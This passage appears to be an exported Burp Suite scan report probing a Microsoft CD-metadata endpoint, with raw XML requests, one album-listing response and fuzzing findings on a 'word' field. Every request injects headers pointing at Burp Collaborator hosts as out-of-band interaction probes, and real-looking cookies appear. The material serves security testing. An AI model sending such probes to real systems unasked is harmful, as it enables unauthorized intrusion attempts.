X-Real-IP: spoofed.3kocacp07c159lq5pvmhc9vs7jdo8kw9.burpcollaborator.net
Forwarded: for=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net;by=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net;host=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net
X-Forwarded-For: spoofed.6krfafp37f189oq8pymkccvv7mdr8pwe.burpcollaborator.net
Contact: root@7z7gpg44mgg9op594z1lrdawmnssnrbg.burpcollaborator.net
From: root@xjk696ou660z8fpzoplbb3um6dci7iv7.burpcollaborator.net
True-Client-IP: spoofed.y327t78vq7k0sg908q5cv4enqewjrkf9.burpcollaborator.net
X-Wap-Profile: http://h0iqqq5enqhjpz6j592vsnb6nxt2o4ct.burpcollaborator.net/wap.xml
Client-ip: spoofed.yxz7n72vk7e0mg302qzcp48nkeqjln9c.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>A4A0B91B-E672-45EA-BE7F-8A1A75EFF43F</mdqRequestID>
<album>
<title>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</title>
<artist>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</artist>
</album>
<track>
<title>
<text>Guilty</text>
<word>empty</word>
</title>
<artist>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</artist>
<trackNumber>2</trackNumber>
<filename>02 Guilty.m4a</filename>
<trackDuration>242091</trackDuration>
<bitrate>283248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=A4A0B91B-E672-45EA-BE7F-8A1A75EFF43F&rk0mfkt3e4=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@r3v0t08oq0kts99t8j55vxegq7wcrff4.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1074
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://7s0gigx4fg99hpy9xzulkd3wfnlsgn4c.burpcollaborator.net/ref
X-Real-IP: spoofed.3kocacp07c159lq5pvmhc9vs7jdo8kw9.burpcollaborator.net
Forwarded: for=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net;by=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net;host=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net
X-Forwarded-For: spoofed.6krfafp37f189oq8pymkccvv7mdr8pwe.burpcollaborator.net
Contact: root@7z7gpg44mgg9op594z1lrdawmnssnrbg.burpcollaborator.net
From: root@xjk696ou660z8fpzoplbb3um6dci7iv7.burpcollaborator.net
True-Client-IP: spoofed.y327t78vq7k0sg908q5cv4enqewjrkf9.burpcollaborator.net
X-Wap-Profile: http://h0iqqq5enqhjpz6j592vsnb6nxt2o4ct.burpcollaborator.net/wap.xml
Client-ip: spoofed.yxz7n72vk7e0mg302qzcp48nkeqjln9c.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>A4A0B91B-E672-45EA-BE7F-8A1A75EFF43F</mdqRequestID>
<album>
<title>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</title>
<artist>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</artist>
</album>
<track>
<title>
<text>Guilty</text>
<word>zmpty</word>
</title>
<artist>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</artist>
<trackNumber>2</trackNumber>
<filename>02 Guilty.m4a</filename>
<trackDuration>242091</trackDuration>
<bitrate>283248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

5.5. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	80	3
whole_body_content	X	Y
content_length	6443	227
limited_body_content	X	Y

Magic value: empty	empty	ezpty
word_count	80	3
whole_body_content	X	Y
content_length	6443	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=B098F81B-DB7D-4C7E-A62B-E92ABB9287E4&tilmu8=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@p1ryry6moyirq77r6h33tvceo5uwowhk6.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1042
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://l1nuru6iouinq37n6d3ztrcao1usorpfe.burpcollaborator.net/ref
X-Real-IP: spoofed.u613w3brt3nwvccwbm88y0hjtaz1t0vok.burpcollaborator.net
Forwarded: for=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net;by=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net;host=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net
X-Forwarded-For: spoofed.lc1u2uhizutn13inhdez4rnaz15szr3fs.burpcollaborator.net
Contact: root@uig383nr53zw7cownmk8a0tj5ab150aoz.burpcollaborator.net
From: root@j2msss7gpsjlr18l7b4xupd8pzvqpqfe4.burpcollaborator.net
True-Client-IP: spoofed.mf5v5vkj2vwo44lokeh07sqb228t2tthi.burpcollaborator.net
X-Wap-Profile: http://jreshswges8lg1xlwbtxjp28ezkqeq6ev.burpcollaborator.net/wap.xml
Client-ip: spoofed.6lsfbfq38f28aor8qynkdcwv8med8d21r.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>B098F81B-DB7D-4C7E-A62B-E92ABB9287E4</mdqRequestID>
<album>
<title>
<text>The Reason</text>
<word>The</word>
<word>Reason</word>
</title>
<artist>
<text>Hoobastank</text>
<word>Hoobastank</word>
</artist>
</album>
<track>
<title>
<text>The Reason</text>
<word>The</word>
<word>undefined</word>
</title>
<artist>
<text>Hoobastank</text>
<word>Hoobastank</word>
</artist>
<trackNumber>8</trackNumber>
<filename>08 The Reason.m4a</filename>
<trackDuration>232849</trackDuration>
<bitrate>275840</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=B098F81B-DB7D-4C7E-A62B-E92ABB9287E4&xhtrb4uzm8=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@p1ryry6moyirq77r6h33tvceo5uwowhk6.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1042
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://l1nuru6iouinq37n6d3ztrcao1usorpfe.burpcollaborator.net/ref
X-Real-IP: spoofed.u613w3brt3nwvccwbm88y0hjtaz1t0vok.burpcollaborator.net
Forwarded: for=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net;by=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net;host=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net
X-Forwarded-For: spoofed.lc1u2uhizutn13inhdez4rnaz15szr3fs.burpcollaborator.net
Contact: root@uig383nr53zw7cownmk8a0tj5ab150aoz.burpcollaborator.net
From: root@j2msss7gpsjlr18l7b4xupd8pzvqpqfe4.burpcollaborator.net
True-Client-IP: spoofed.mf5v5vkj2vwo44lokeh07sqb228t2tthi.burpcollaborator.net
X-Wap-Profile: http://jreshswges8lg1xlwbtxjp28ezkqeq6ev.burpcollaborator.net/wap.xml
Client-ip: spoofed.6lsfbfq38f28aor8qynkdcwv8med8d21r.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>B098F81B-DB7D-4C7E-A62B-E92ABB9287E4</mdqRequestID>
<album>
<title>
<text>The Reason</text>
<word>The</word>
<word>Reason</word>
</title>
<artist>
<text>Hoobastank</text>
<word>Hoobastank</word>
</artist>
</album>
<track>
<title>
<text>The Reason</text>
<word>The</word>
<word>zndefined</word>
</title>
<artist>
<text>Hoobastank</text>
<word>Hoobastank</word>
</artist>
<trackNumber>8</trackNumber>
<filename>08 The Reason.m4a</filename>
<trackDuration>232849</trackDuration>
<bitrate>275840</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=B098F81B-DB7D-4C7E-A62B-E92ABB9287E4&qit31ubqns6=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@p1ryry6moyirq77r6h33tvceo5uwowhk6.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1038
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://l1nuru6iouinq37n6d3ztrcao1usorpfe.burpcollaborator.net/ref
X-Real-IP: spoofed.u613w3brt3nwvccwbm88y0hjtaz1t0vok.burpcollaborator.net
Forwarded: for=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net;by=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net;host=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net
X-Forwarded-For: spoofed.lc1u2uhizutn13inhdez4rnaz15szr3fs.burpcollaborator.net
Contact: root@uig383nr53zw7cownmk8a0tj5ab150aoz.burpcollaborator.net
From: root@j2msss7gpsjlr18l7b4xupd8pzvqpqfe4.burpcollaborator.net
True-Client-IP: spoofed.mf5v5vkj2vwo44lokeh07sqb228t2tthi.burpcollaborator.net
X-Wap-Profile: http://jreshswges8lg1xlwbtxjp28ezkqeq6ev.burpcollaborator.net/wap.xml
Client-ip: spoofed.6lsfbfq38f28aor8qynkdcwv8med8d21r.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>B098F81B-DB7D-4C7E-A62B-E92ABB9287E4</mdqRequestID>
<album>
<title>
<text>The Reason</text>
<word>The</word>
<word>Reason</word>
</title>
<artist>
<text>Hoobastank</text>
<word>Hoobastank</word>
</artist>
</album>
<track>
<title>
<text>The Reason</text>
<word>The</word>
<word>empty</word>
</title>
<artist>
<text>Hoobastank</text>
<word>Hoobastank</word>
</artist>
<trackNumber>8</trackNumber>
<filename>08 The Reason.m4a</filename>
<trackDuration>232849</trackDuration>
<bitrate>275840</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=B098F81B-DB7D-4C7E-A62B-E92ABB9287E4&hgbsvdys4=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@p1ryry6moyirq77r6h33tvceo5uwowhk6.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1038
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://l1nuru6iouinq37n6d3ztrcao1usorpfe.burpcollaborator.net/ref
X-Real-IP: spoofed.u613w3brt3nwvccwbm88y0hjtaz1t0vok.burpcollaborator.net
Forwarded: for=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net;by=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net;host=spoofed.w855y5dtv5pyxeeydoaa02jlvc13v2yqn.burpcollaborator.net
X-Forwarded-For: spoofed.lc1u2uhizutn13inhdez4rnaz15szr3fs.burpcollaborator.net
Contact: root@uig383nr53zw7cownmk8a0tj5ab150aoz.burpcollaborator.net
From: root@j2msss7gpsjlr18l7b4xupd8pzvqpqfe4.burpcollaborator.net
True-Client-IP: spoofed.mf5v5vkj2vwo44lokeh07sqb228t2tthi.burpcollaborator.net
X-Wap-Profile: http://jreshswges8lg1xlwbtxjp28ezkqeq6ev.burpcollaborator.net/wap.xml
Client-ip: spoofed.6lsfbfq38f28aor8qynkdcwv8med8d21r.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>B098F81B-DB7D-4C7E-A62B-E92ABB9287E4</mdqRequestID>
<album>
<title>
<text>The Reason</text>
<word>The</word>
<word>Reason</word>
</title>
<artist>
<text>Hoobastank</text>
<word>Hoobastank</word>
</artist>
</album>
<track>
<title>
<text>The Reason</text>
<word>The</word>
<word>zmpty</word>
</title>
<artist>
<text>Hoobastank</text>
<word>Hoobastank</word>
</artist>
<trackNumber>8</trackNumber>
<filename>08 The Reason.m4a</filename>
<trackDuration>232849</trackDuration>
<bitrate>275840</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

5.6. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	70	3
whole_body_content	X	Y
content_length	9684	227
limited_body_content	X	Y

Magic value: empty	empty	ezpty
word_count	70	3
whole_body_content	X	Y
content_length	9684	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=27054536-05BB-44BB-90B8-978ADD3124EB&lmx91gtc3=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@fdwo3oic0ouh2xjhi7ft5lo40v6m0ct0i.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1028
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://58beyed2vep7xne7dxaj0bjuvl1cuhv5k.burpcollaborator.net/ref
X-Real-IP: spoofed.xst6i6xuf69zhfyzxpubk33mfdl4e9gx5.burpcollaborator.net
Forwarded: for=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net;by=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net;host=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net
X-Forwarded-For: spoofed.lxmunu2ikuenm33n2dzzpr8ak1qsjxnlc.burpcollaborator.net
Contact: root@f9pozoecwoqhyxfhe7bt1lk4wv2mvr0fp.burpcollaborator.net
From: root@6qxfgfv3df78fow8vyskic1vdmjdd33rs.burpcollaborator.net
True-Client-IP: spoofed.havq0qfexqrjzzgjf9cv2nl6xx3oxeo2d.burpcollaborator.net
X-Wap-Profile: http://xbc616guy6sz0fhzgpdb33mmyd44yuqif.burpcollaborator.net/wap.xml
Client-ip: spoofed.3imc8cn05cz57lo5nvkha9ts5jba50zoo.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>27054536-05BB-44BB-90B8-978ADD3124EB</mdqRequestID>
<album>
<title>
<text>Middle of Nowhere</text>
<word>Middle</word>
<word>of</word>
<word>Nowhere</word>
</title>
<artist>
<text>Hanson</text>
<word>Hanson</word>
</artist>
</album>
<track>
<title>
<text>MMMBop</text>
<word>undefined</word>
</title>
<artist>
<text>Hanson</text>
<word>Hanson</word>
</artist>
<trackNumber>2</trackNumber>
<filename>02 MMMBop.m4a</filename>
<trackDuration>268678</trackDuration>
<bitrate>270264</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 01:20:26 GMT
Connection: close

<METADATA><mdqRequestID>27054536-05BB-44BB-90B8-978ADD3124EB</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Unique Album/Performer Match</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>27054536-05BB-44BB-90B8-978ADD3124EB</mdqRequestID><WMCollectionID>49b1ba54-3743-4383-9f9b-ae354c383b9c</WMCollectionID><WMCollectionGroupID>49b1ba54-3743-4383-9f9b-ae354c383b9c</WMCollectionGroupID><uniqueFileID>AMGa_id=R 276221</uniqueFileID><albumTitle>Middle of Nowhere</albumTitle><albumArtist>Hanson</albumArtist><releaseDate>1997-05-05</releaseDate><label>Mercury</label><genre>Pop</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>7</publisherRating><buyParams>providerName=AMG&albumID=49B1BA54-3743-4383-9F9B-AE354C383B9C&a_id=R%20%20%20276221&album=Middle%20of%20Nowhere&artistID=483BEC3D-4070-4EE9-A151-967A8E3E8E18&p_id=P%20%20%20207164&artist=Hanson</buyParams><largeCoverParams>200/drS600/S605/S60570V01J5.jpg</largeCoverParams><smallCoverParams>075/drS600/S605/S60570V01J5.jpg</smallCoverParams><moreInfoParams>a_id=R%20%20%20276221</moreInfoParams><dataProvider>AMG</dataProvider><dataProviderParams>Provider=AMG</dataProviderParams><dataProviderLogo>Provider=AMG</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>e9cbd5ac-9700-4b6b-9025-5774308ca048</WMContentID><trackRequestID></trackRequestID><trackTitle>Thinking of You</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769557</uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>4d43e458-fc16-4525-bc2f-f017971a46eb</WMContentID><trackRequestID>0</trackRequestID><trackTitle>Mmmbop</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769512</uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>180e5474-a0c6-48a8-91b8-090fdf4a51c6</WMContentID><trackRequestID></trackRequestID><trackTitle>Weird</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769542</uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>fa3fa53b-822d-4e27-bcac-39ff7f47d8cc</WMContentID><trackRequestID></trackRequestID><trackTitle>Speechless</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769656</uniqueFileID><trackNumber>4</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>bb897feb-4057-450a-91b7-9e783a9d77e5</WMContentID><trackRequestID></trackRequestID><trackTitle>Where's the Love</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769374</uniqueFileID><trackNumber>5</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>e2151e1a-f019-4359-97f6-24c6d3a6107f</WMContentID><trackRequestID></trackRequestID><trackTitle>Yearbook</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769776</uniqueFileID><trackNumber>6</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>8575b3b2-6340-4829-8575-e7ba81ecfa52</WMContentID><trackRequestID></trackRequestID><trackTitle>Look at You</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769853</uniqueFileID><trackNumber>7</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>0d7c4f74-c815-45e0-ad88-f653cda3c2ad</WMContentID><trackRequestID></trackRequestID><trackTitle>Lucy</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769757</uniqueFileID><trackNumber>8</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>c47d32b0-3c8f-4216-b3ea-58d69ef9b7ed</WMContentID><trackRequestID></trackRequestID><trackTitle>I Will Come to You</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769905</uniqueFileID><trackNumber>9</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>01c6316e-af7c-4da5-a6f7-ac710f508d66</WMContentID><trackRequestID></trackRequestID><trackTitle>A Minute Without You</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769690</uniqueFileID><trackNumber>10</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>c761e294-5501-4952-a1c9-a63eba6e65d3</WMContentID><trackRequestID></trackRequestID><trackTitle>Madeline</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769403</uniqueFileID><trackNumber>11</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>6d032d84-6fde-42eb-a489-61fb417b023e</WMContentID><trackRequestID></trackRequestID><trackTitle>With You in Your Dreams</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26768947</uniqueFileID><trackNumber>12</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>4aeec08f-94be-4917-b20c-0d8633bcd3f5</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26768890</uniqueFileID><trackNumber>13</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>bd43e1dc-ccef-495d-9fc7-852bfea4d5f3</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769490</uniqueFileID><trackNumber>14</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>9ecc8b0a-5139-4902-a4da-45ef42f79377</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769661</uniqueFileID><trackNumber>15</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>9dffd777-0bf8-46b0-a767-3bd21b7d83e9</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769483</uniqueFileID><trackNumber>16</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>a5a143f5-d264-4546-b4ae-f7887c8ac06f</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769822</uniqueFileID><trackNumber>17</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>669b543f-2e63-4c82-a7e5-76166aa484e5</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769934</uniqueFileID><trackNumber>18</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>101f1760-bd69-409c-9862-6e861ff76ae4</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769309</uniqueFileID><trackNumber>19</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>7f713e44-5b23-491a-9a38-ec812738a0a6</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769658</uniqueFileID><trackNumber>20</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>51e334bc-7868-4a77-ac04-070c1f68c1ab</WMContentID><trackRequestID></trackRequestID><trackTitle>Man From Milwaukee [*][Garage Mix]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26768888</uniqueFileID><trackNumber>21</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=27054536-05BB-44BB-90B8-978ADD3124EB&yulw87yyq27=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@fdwo3oic0ouh2xjhi7ft5lo40v6m0ct0i.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1028
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
